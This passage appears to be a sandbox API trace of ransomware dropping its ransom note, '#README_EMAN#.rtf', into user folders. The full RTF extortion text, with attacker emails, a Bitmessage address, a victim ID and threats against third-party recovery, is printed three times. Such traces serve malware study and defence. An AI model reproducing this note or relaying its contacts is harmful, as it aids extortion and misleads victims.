m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0288.142] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0288.142] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1eeaaa8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n)K\x8d\x97\x8f\x01ú\x9fÜ\x02-\x84\x06\x985JS\x14A\x91", lpUsedDefaultChar=0x0) returned 8717 [0288.142] WriteFile (in: hFile=0x2f0, lpBuffer=0x1eeaaa8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1eeaaa8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0288.144] CloseHandle (hObject=0x2f0) returned 1 [0288.148] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sl\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sl\\#readme_eman#.rtf")) returned 0xffffffff [0288.148] GetLastError () returned 0x2 [0288.148] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sl\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sl\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 